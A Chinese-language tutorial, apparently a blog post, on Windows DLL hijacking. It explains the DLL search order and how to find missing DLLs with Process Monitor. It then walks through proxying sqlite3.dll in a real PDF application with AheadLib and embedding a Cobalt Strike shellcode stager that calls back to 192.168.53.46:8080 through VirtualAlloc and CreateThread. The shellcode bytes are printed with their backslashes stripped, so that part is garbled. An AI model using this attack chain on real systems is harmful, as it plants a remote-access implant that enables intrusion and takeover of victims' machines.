dll劫持

dll为动态链接库文件，又称"应用程序拓展"，是软件文件类型。在Windows中许多应用程序并不是一个完整的可执行文件，它们被分割成一些相对独立的动态链接库文件，即dll文件，放置于系统中，个人理解类似于我们编程中引入的模块。

如果在一个进程加载dll时没有指定dll的绝对路径，那么windows会尝试去按照顺序搜索这些特定目录来查找这个dll。如果攻击者将恶意的dll放在优先于正常dll所在目录，那么就能够欺骗系统去加载恶意的dll,形成dll劫持。

• 程序加载目录
• 系统目录。使用GetSystemDirectory获取该路径
• 16位系统目录
• windows目录，使用GetWindowsDirectory获取该路径
• windows当前目录
• PATH环境变量中列出的目录

从windows7之后，微软为了更进一步的防御系统的dll劫持，将一些容易被劫持的系统dll写进了一个注册表项中，那么凡是在此项目下的dll文件就会被禁止从exe自身所在目录下调用，而只能从系统目录即system32目录下调用

• 默认情况下：

HKEY_LOCAL_MACHINESystemCurrentControlSetControlSession ManagerSafeDllSearchMode

处于开启状态，如果手动设置为0，关闭该安全选项，搜索顺序为：在以上顺序的基础上，将 当前目录 修改至 系统目录 的位置，其他顺移。

另外当前应用程序加载dll时如果仅指定dll名称时，那么将按照以上顺序搜索dll文件，不过在加载之前还需要满足以下两条规范：
1.当内存中已加载相同模块名称的dll时，系统将直接夹在该dll,不会进行搜索，除非设置了dll重定向选项
2.如果要加载的dll模块属于known dlls，系统直接加载系统目录下的该dll，不会进行搜索

windows操作系统通过”dll路径搜索目录顺序"和“known dlls注册表项"来确定应用程序所要调用的dll的路径，当一个进程尝试加载一个dll的时候，会先尝试搜索程序所处的目录，若还没有找到，则向下搜索16位系统目录即system目录，然后windows目录，当前目录，path环境变量的各个目录。

这样的加载顺序很容易就会导致一个系统的dll被劫持，只要攻击者将目标文件和恶意dll放在一起即可导致恶意dll搜索顺序优先于系统dll目录加载，就能够欺骗系统去加载恶意的dll，形成"dll劫持"。

用到的工具 Process Monitor v3.60
通过process monitor监控dll调用是一种最基础的寻找dll劫持的方式
设置过滤规则:(默认的不需要改变)

Path ends with .dll
Result is NAME NOT FOUND
Process Name contains 进程名称

然后这里找到一个需要用到loadlibrary这个api的dll，这里找有个api的原因是因为如果该dll的调用栈中存在有 **loadlibrary(Ex) * *,说明这个dll被进程所动态加载的。如果这种利用场景下，伪造的dll文件不需要存在任何导出函数即可被成功加载，即使加载后进程内部出错，也是在dll被加载成功加载之后的事情。
loadlibrary和loadlibraryex是一个本地加载，一个是远程加载，如果dll不在调用的同一目录下，就可以使用loadlibrary(L"DLL绝对路径")加载。但是如果DLL内部又调用一个DLL，就需要使用loadlibraryex进行远程加载

LoadLibraryEx(“DLL绝对路径”, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);

LoadLibraryEx的最后一个参数设置为load_With_altered_Search_path即可让系统dll搜索顺序从我们设置的目录开始

找到可以被劫持的dll文件

编写恶意的dll

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include 

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    system("calc");
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

用vs创建dll项目，并生成

这里演示程序为极速pdf
https://jisupdf.com/
安装好有得到如下文件

这里先用cobalt strike生成payload

设置好监听，然后生成

打开工具aheadlib,然后这里以sqlite3.dll为例


然后就会生成一个cpp文件
新建一个dll项目


将生成的cpp文件覆盖到dllmain.cpp文件中

	unsigned char buf[] = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68x90x1fx00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x40x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx74x47x39x68x00x35x4fx21x50x25x40x41x50x5bx34x5cx50x5ax58x35x34x28x50x5ex29x37x43x43x29x37x7dx24x45x49x43x41x52x2dx53x54x41x4ex44x41x52x44x2dx41x4ex54x49x56x49x52x55x53x2dx54x45x53x54x2dx46x49x4cx45x21x24x48x2bx48x2ax00x35x4fx21x50x25x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x3bx20x42x4fx49x45x39x3bx45x4ex41x55x29x0dx0ax00x35x4fx21x50x25x40x41x50x5bx34x5cx50x5ax58x35x34x28x50x5ex29x37x43x43x29x37x7dx24x45x49x43x41x52x2dx53x54x41x4ex44x41x52x44x2dx41x4ex54x49x56x49x52x55x53x2dx54x45x53x54x2dx46x49x4cx45x21x24x48x2bx48x2ax00x35x4fx21x50x25x40x41x50x5bx34x5cx50x5ax58x35x34x28x50x5ex29x37x43x43x29x37x7dx24x45x49x43x41x52x2dx53x54x41x4ex44x41x52x44x2dx41x4ex54x49x56x49x52x55x53x2dx54x45x53x54x2dx46x49x4cx45x21x24x48x2bx48x2ax00x35x4fx21x50x25x40x41x50x5bx34x5cx50x5ax58x35x34x28x50x5ex29x37x43x43x29x37x7dx24x45x49x43x41x52x2dx53x54x41x4ex44x41x52x44x2dx41x4ex54x49x56x49x52x55x53x2dx54x45x53x54x2dx46x49x4cx45x21x24x48x2bx48x2ax00x35x4fx21x50x25x40x41x50x5bx00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x39x32x2ex31x36x38x2ex35x33x2ex34x36x00x00x00x00x00";
	void *exec = VirtualAlloc(0,sizeof(buf),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
	memcpy(exec,buf,sizeof(buf));
	CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);//创建线程运行shellcode

然后生成文件
将生成的dll文件和原dll文件进行替换


注意payload的位数要和生产dll文件的位数一致